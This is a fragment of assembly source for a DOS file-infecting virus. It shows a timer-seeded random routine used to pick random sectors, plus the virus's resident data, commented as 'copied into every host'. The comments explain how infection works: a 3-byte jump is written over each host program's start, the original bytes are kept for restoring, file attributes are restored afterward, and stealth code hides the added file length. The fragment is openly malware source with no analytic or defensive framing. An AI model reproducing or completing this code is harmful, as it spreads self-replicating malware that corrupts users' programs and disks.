; Only used by random_sector.
;-----------------------------------------------------------------------
get_rnd:
push dx
push cx
push bx
in al,40h ;'@'
add ax,0000
mov dx,0000
mov cx,0007
rnd_init5:
shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns rnd_init6
inc al
rnd_init6:
loop rnd_init5
pop bx
mov al,dl
pop cx
pop dx
rnd_init_ret:
ret
; Resident data (part of the body, so it is copied into every host).
; filelen    = body length in bytes (start..eof), written by infect and
;              subtracted from sizes by the stealth code.
; memlen     = paragraphs taken from the host's memory block by start
;              (300 paragraphs = 4800 bytes).
; filename   = ASCIIZ scratch used by find_new and infect (25 bytes max).
; attribute  = saved file attributes, restored after infection.
; jmp_1/jmp_2 = the 3-byte E9 jmp written over the host's first bytes.
; first_bytes = the host's original first 3 bytes, kept INSIDE the body so
;              cancel and open can restore them. The initial 90h,CDh,20h
;              is nop / int 20h: the first-generation dropper simply
;              terminates after installing itself.
filelen dw offset eof - offset start
memlen dw 300
filename db 25 dup(?)
attribute dw ?
jmp_1 db 0e9h
jmp_2 dw ?
first_bytes db 90h,0cdh,20h
eof:
end start